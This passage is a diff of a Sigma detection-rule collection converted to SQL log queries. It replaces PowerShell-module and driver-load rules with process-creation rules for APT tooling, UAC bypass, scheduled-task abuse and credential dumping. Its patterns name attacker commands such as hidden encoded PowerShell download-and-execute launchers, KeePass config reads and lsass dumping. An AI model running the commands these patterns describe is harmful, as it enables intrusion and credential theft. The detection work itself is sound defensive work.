"attack.impact" + "attack.t1012", + "attack.defense_evasion", + "attack.t1036.004", + "attack.t1027", + "attack.execution", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "Administrators that use checkadmin.exe tool to enumerate local administrators" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Import-Module %' ESCAPE '\\' OR Payload LIKE '%ipmo %' ESCAPE '\\') AND Payload LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%checkadmin.exe 127.0.0.1 -all%' ESCAPE '\\' OR CommandLine LIKE '%netsh advfirewall firewall add rule name=powershell dir=in%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c powershell.exe -ep bypass -file c:\\\\s.ps1%' ESCAPE '\\' OR CommandLine LIKE '%/tn win32times /f%' ESCAPE '\\' OR CommandLine LIKE '%create win32times binPath=%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\windows\\\\system32\\\\devmgr.dll%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass -enc JgAg%' ESCAPE '\\' OR CommandLine LIKE '%type %keepass\\\\KeePass.config.xml%' ESCAPE '\\' OR CommandLine LIKE '%iie.exe iie.txt%' ESCAPE '\\' OR CommandLine LIKE '%reg query HKEY\\_CURRENT\\_USER\\\\Software\\\\%\\\\PuTTY\\\\Sessions\\\\%' ESCAPE '\\'))" ], - "filename": "posh_pm_active_directory_module_dll_import.yml" + "filename": "proc_creation_win_apt_wocao.yml" }, { - "title": "Suspicious PowerShell Invocations - Specific - PowerShell Module", - "id": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", - "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", + "title": "CMSTP UAC Bypass via COM Object Access", + "id": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", + "status": "stable", + "description": "Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)", + "author": "Nik Seetharaman, Christian Burkard (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ], "falsepositives": [ - "Unknown" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-noni%' ESCAPE '\\' AND ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-ep%' ESCAPE '\\' AND ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-Enc%' ESCAPE '\\') OR (ContextInfo LIKE '%powershell%' ESCAPE '\\' AND ContextInfo LIKE '%reg%' ESCAPE '\\' AND ContextInfo LIKE '%add%' ESCAPE '\\' AND ContextInfo LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-noprofile%' ESCAPE '\\' AND ContextInfo LIKE '%-windowstyle%' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%new-object%' ESCAPE '\\' AND ContextInfo LIKE '%system.net.webclient%' ESCAPE '\\' AND ContextInfo LIKE '%.download%' ESCAPE '\\') OR (ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\' AND ContextInfo LIKE '%Net.WebClient%' ESCAPE '\\' AND ContextInfo LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ContextInfo LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}%' ESCAPE '\\') AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "posh_pm_susp_invocation_specific.yml" + "filename": "proc_creation_win_uac_bypass_cmstp_com_object_access.yml" }, { - "title": "PowerShell Get Clipboard", - "id": "4cbd4f12-2e22-43e3-882f-bff3247ffb78", + "title": "Suspicious Schtasks From Env Var Folder", + "id": "81325ce1-be01-4250-944f-b4789644556f", "status": "experimental", - "description": "A General detection for the Get-Clipboard commands in PowerShell logs. This could be an adversary capturing clipboard contents.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1115" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "Benign scheduled tasks creations or executions that happen often during software installations", + "Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Get-Clipboard%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\')) OR (ParentCommandLine LIKE '%\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND (CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%/Create /TN TVInstallRestore /TR%' ESCAPE '\\') OR ParentCommandLine LIKE '%unattended.ini%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /Xml \"C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\.CR.%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_Security\\_Installation.xml%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /F /TN%' ESCAPE '\\' AND CommandLine LIKE '%/Xml %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_%' ESCAPE '\\' AND (CommandLine LIKE '%.tmp\\\\UpdateFallbackTask.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\WatchdogServiceControlManagerTimeout.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\SystrayAutostart.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\MaintenanceTask.xml%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/Create /TN \"klcp\\_update\" /XML %' ESCAPE '\\' AND CommandLine LIKE '%\\\\klcp\\_update\\_task.xml%' ESCAPE '\\')))" ], - "filename": "posh_pm_get_clipboard.yml" + "filename": "proc_creation_win_schtasks_env_folder.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module", - "id": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", + "title": "Finger.exe Suspicious Invocation", + "id": "af491bca-e752-4b44-9c86-df5680533dbc", "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays", + "author": "Florian Roth (Nextron Systems), omkar72, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Admin activity (unclear what they do nowadays with finger.exe)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'finger.exe' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_var.yml" + "filename": "proc_creation_win_finger_usage.yml" }, { - "title": "Clear PowerShell History - PowerShell Module", - "id": "f99276ad-d122-4989-a09a-d00904a5f9d2", - "status": "experimental", - "description": "Detects keywords that could indicate clearing PowerShell history", - "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "title": "HackTool - Dumpert Process Dumper Execution", + "id": "2704ab9e-afe2-4854-a3b1-0c0706d03578", + "status": "test", + "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.003" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Very unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (((Payload LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND Payload LIKE '%–HistorySaveStyle%' ESCAPE '\\' AND Payload LIKE '%SaveNothing%' ESCAPE '\\') OR (Payload LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND Payload LIKE '%-HistorySaveStyle%' ESCAPE '\\' AND Payload LIKE '%SaveNothing%' ESCAPE '\\')) OR ((Payload LIKE '%del%' ESCAPE '\\' OR Payload LIKE '%Remove-Item%' ESCAPE '\\' OR Payload LIKE '%rm%' ESCAPE '\\') AND Payload LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Hashes LIKE '%09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR CommandLine LIKE '%Dumpert.dll%' ESCAPE '\\'))" ], - "filename": "posh_pm_clear_powershell_history.yml" + "filename": "proc_creation_win_hktl_dumpert.yml" }, { - "title": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Module", - "id": "daf7eb81-35fd-410d-9d7a-657837e602bb", + "title": "Dism Remove Online Package", + "id": "43e32da2-fdd0-4156-90de-50dfd62636f9", "status": "experimental", - "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "description": "Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images", "author": "frack113", "tags": [ - "attack.collection", - "attack.t1074.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Compress-Archive %' ESCAPE '\\' AND ContextInfo LIKE '% -Path %' ESCAPE '\\' AND ContextInfo LIKE '% -DestinationPath %' ESCAPE '\\' AND ContextInfo LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\DismHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%/Online%' ESCAPE '\\' AND ParentCommandLine LIKE '%/Disable-Feature%' ESCAPE '\\') OR (Image LIKE '%\\\\Dism.exe' ESCAPE '\\' AND CommandLine LIKE '%/Online%' ESCAPE '\\' AND CommandLine LIKE '%/Disable-Feature%' ESCAPE '\\')))" ], - "filename": "posh_pm_susp_zip_compress.yml" + "filename": "proc_creation_win_dsim_remove.yml" }, { - "title": "Suspicious Get-ADDBAccount Usage", - "id": "b140afd9-474b-4072-958e-2ebb435abd68", - "status": "test", - "description": "Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers", - "author": "Florian Roth (Nextron Systems)", + "title": "Computer Discovery And Export Via Get-ADComputer Cmdlet", + "id": "435e10e4-992a-4281-96f3-38b11106adde", + "status": "experimental", + "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Unknown" + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Get-ADDBAccount%' ESCAPE '\\' AND Payload LIKE '%BootKey %' ESCAPE '\\' AND Payload LIKE '%DatabasePath %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Get-ADComputer %' ESCAPE '\\' AND CommandLine LIKE '% -Filter \\*' ESCAPE '\\' AND (CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% | Select %' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%Set-Content%' ESCAPE '\\' OR CommandLine LIKE '%Add-Content%' ESCAPE '\\')))" ], - "filename": "posh_pm_get_addbaccount.yml" + "filename": "proc_creation_win_powershell_computer_discovery_get_adcomputer.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - PowerShell Module", - "id": "ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", + "title": "Root Certificate Installed From Susp Locations", + "id": "5f6a601c-2ecb-498b-9c33-660362323afa", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1553.004" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Import-Certificate%' ESCAPE '\\' AND CommandLine LIKE '% -FilePath %' ESCAPE '\\' AND CommandLine LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_use_clip.yml" + "filename": "proc_creation_win_powershell_import_cert_susp_locations.yml" }, { - "title": "Process Hacker and System Informer Driver Load", - "id": "67add051-9ee7-4ad3-93ba-42935615ae8d", + "title": "HackTool - Impersonate Execution", + "id": "cf0c254b-22f1-4b2b-8221-e137b3c0af94", "status": "experimental", - "description": "Detects the load of drivers used by Process Hacker and System Informer", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of the Impersonate tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", + "author": "Sai Prashanth Pulisetti @pulisettis", "tags": [ "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543" + "attack.defense_evasion", + "attack.t1134.001", + "attack.t1134.003" ], "falsepositives": [ - "Legitimate user of process hacker or system informer by low level developers or system administrators" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\kprocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SystemInformer.sys' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=821D74031D3F625BCBD0DF08B70F1E77%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=F86759BB4DE4320918615DC06E998A39%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0A64EEB85419257D0CE32BD5D55C3A18%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6E7B34DFC017700B1517B230DF6FF0D0%' ESCAPE '\\') OR Imphash IN ('821D74031D3F625BCBD0DF08B70F1E77', 'F86759BB4DE4320918615DC06E998A39', '0A64EEB85419257D0CE32BD5D55C3A18', '6E7B34DFC017700B1517B230DF6FF0D0') OR (Hashes LIKE '%SHA256=8B9AD98944AC9886EA4CB07700E71B78BE4A2740934BB7E46CA3B56A7C59AD24%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A41348BEC147CA4D9EA2869817527EB5CEA2E20202AF599D2B30625433BCF454%' ESCAPE '\\' OR Hashes LIKE '%SHA256=38EE0A88AF8535A11EFE8D8DA9C6812AA07067B75A64D99705A742589BDD846D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A773891ACF203A7EB0C0D30942FB1347648F1CD918AE2BFD9A4857B4DCF5081B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4C3B81AC88A987BBDF7D41FA0AECC2CEDF5B9BD2F45E7A21F376D05345FC211D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3241BC14BEC51CE6A691B9A3562E5C1D52E9D057D27A3D67FD0B245C350B6D34%' ESCAPE '\\' OR Hashes LIKE '%SHA256=047C42E9BBA28366868847C7DAFC1E043FB038C796422D37220493517D68EE89%' ESCAPE '\\' OR Hashes LIKE '%SHA256=18931DC81E95D0020466FA091E16869DBE824E543A4C2C8FE644FA71A0F44FEB%' ESCAPE '\\' OR Hashes LIKE '%SHA256=B4C2EF76C204273132FDE38F0DED641C2C5EE767652E64E4C4071A4A973B6C1B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=640954AFC268565F7DAA6E6F81A8EE05311E33E34332B501A3C3FE5B22ADEA97%' ESCAPE '\\' OR Hashes LIKE '%SHA256=251BE949F662C838718F8AA0A5F8211FB90346D02BD63FF91E6B224E0E01B656%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E2606F272F7BA054DF16BE464FDA57211EF0D14A0D959F9C8DCB0575DF1186E4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3A9E1D17BEEB514F1B9B3BACAEE7420285DE5CBDCE89C5319A992C6CBD1DE138%' ESCAPE '\\') OR sha256 IN ('8b9ad98944ac9886ea4cb07700e71b78be4a2740934bb7e46ca3b56a7c59ad24', 'a41348bec147ca4d9ea2869817527eb5cea2e20202af599d2b30625433bcf454', '38ee0a88af8535a11efe8d8da9c6812aa07067b75a64d99705a742589bdd846d', 'a773891acf203a7eb0c0d30942fb1347648f1cd918ae2bfd9a4857b4dcf5081b', '4c3b81ac88a987bbdf7d41fa0aecc2cedf5b9bd2f45e7a21f376d05345fc211d', '3241bc14bec51ce6a691b9a3562e5c1d52e9d057d27a3d67fd0b245c350b6d34', '047c42e9bba28366868847c7dafc1e043fb038c796422d37220493517d68ee89', '18931dc81e95d0020466fa091e16869dbe824e543a4c2c8fe644fa71a0f44feb', 'b4c2ef76c204273132fde38f0ded641c2c5ee767652e64e4c4071a4a973b6c1b', '640954afc268565f7daa6e6f81a8ee05311e33e34332b501a3c3fe5b22adea97', '251be949f662c838718f8aa0a5f8211fb90346d02bd63ff91e6b224e0e01b656', 'e2606f272f7ba054df16be464fda57211ef0d14a0d959f9c8dcb0575df1186e4', '3a9e1d17beeb514f1b9b3bacaee7420285de5cbdce89c5319a992c6cbd1de138')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%impersonate.exe%' ESCAPE '\\' AND (CommandLine LIKE '% list %' ESCAPE '\\' OR CommandLine LIKE '% exec %' ESCAPE '\\' OR CommandLine LIKE '% adduser %' ESCAPE '\\')) OR ((Hashes LIKE '%MD5=9520714AB576B0ED01D1513691377D01%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0A358FFC1697B7A07D0E817AC740DF62%' ESCAPE '\\') OR md5 = '9520714AB576B0ED01D1513691377D01' OR sha256 = 'E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A' OR Imphash = '0A358FFC1697B7A07D0E817AC740DF62')))" ], - "filename": "driver_load_win_process_hacker.yml" + "filename": "proc_creation_win_hktl_impersonate.yml" }, { - "title": "Vulnerable Lenovo Driver Load", - "id": "ac683a42-877b-4ff8-91ac-69e94b0f70b4", - "status": "experimental", - "description": "Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges", + "title": "Ps.exe Renamed SysInternals Tool", + "id": "18da1007-3f26-470f-875d-f77faf1cab31", + "status": "test", + "description": "Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543" + "attack.defense_evasion", + "attack.g0035", + "attack.t1036.003", + "car.2013-05-009" ], "falsepositives": [ - "Legitimate driver loads (old driver that didn't receive an update)" + "Renamed SysInternals tool" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%SHA256=F05B1EE9E2F6AB704B8919D5071BECBCE6F9D0F9D0BA32A460C41D5272134ABE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=B89A8EEF5AEAE806AF5BA212A8068845CAFDAB6F%' ESCAPE '\\' OR Hashes LIKE '%MD5=B941C8364308990EE4CC6EADF7214E0F%' ESCAPE '\\') OR sha256 = 'f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe' OR sha1 = 'b89a8eef5aeae806af5ba212a8068845cafdab6f' OR md5 = 'b941c8364308990ee4cc6eadf7214e0f'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine = 'ps.exe -accepteula')" ], - "filename": "driver_load_win_vuln_lenovo_driver.yml" + "filename": "proc_creation_win_apt_ta17_293a_ps.yml" }, { - "title": "Vulnerable HackSys Extreme Vulnerable Driver Load", - "id": "295c9289-acee-4503-a571-8eacaef36b28", + "title": "Schtasks From Suspicious Folders", + "id": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb", "status": "experimental", - "description": "Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects scheduled task creations that have suspicious action command and folder combinations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\HEVD.sys' ESCAPE '\\' OR (Hashes LIKE '%IMPHASH=f26d0b110873a1c7d8c4f08fbeab89c5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c46ea2e651fd5f7f716c8867c6d13594%' ESCAPE '\\') OR Imphash IN ('f26d0b110873a1c7d8c4f08fbeab89c5', 'c46ea2e651fd5f7f716c8867c6d13594')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_hevd_driver.yml" + "filename": "proc_creation_win_schtasks_folder_combos.yml" }, { - "title": "PowerShell Scripts Run by a Services", - "id": "46deb5e1-28c9-4905-b2df-51cdcc9e6073", + "title": "Potential BearLPE Exploitation", + "id": "931b6802-d6a6-4267-9ffa-526f57f22aaf", "status": "test", - "description": "Detects powershell script installed as a Service", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects potential exploitation of the BearLPE exploit using Task Scheduler \".job\" import arbitrary DACL write\\par", + "author": "Olaf Hartong", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.privilege_escalation", + "attack.t1053.005", + "car.2013-08-001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%powershell%' ESCAPE '\\' OR ImageLoaded LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/RP%' ESCAPE '\\'))" ], - "filename": "driver_load_win_powershell_script_installed_as_service.yml" + "filename": "proc_creation_win_exploit_other_bearlpe.yml" }, { - "title": "Vulnerable Driver Load By Name", - "id": "c316eac1-f3d8-42da-ad1c-66dcec5ca787", - "status": "experimental", - "description": "Detects the 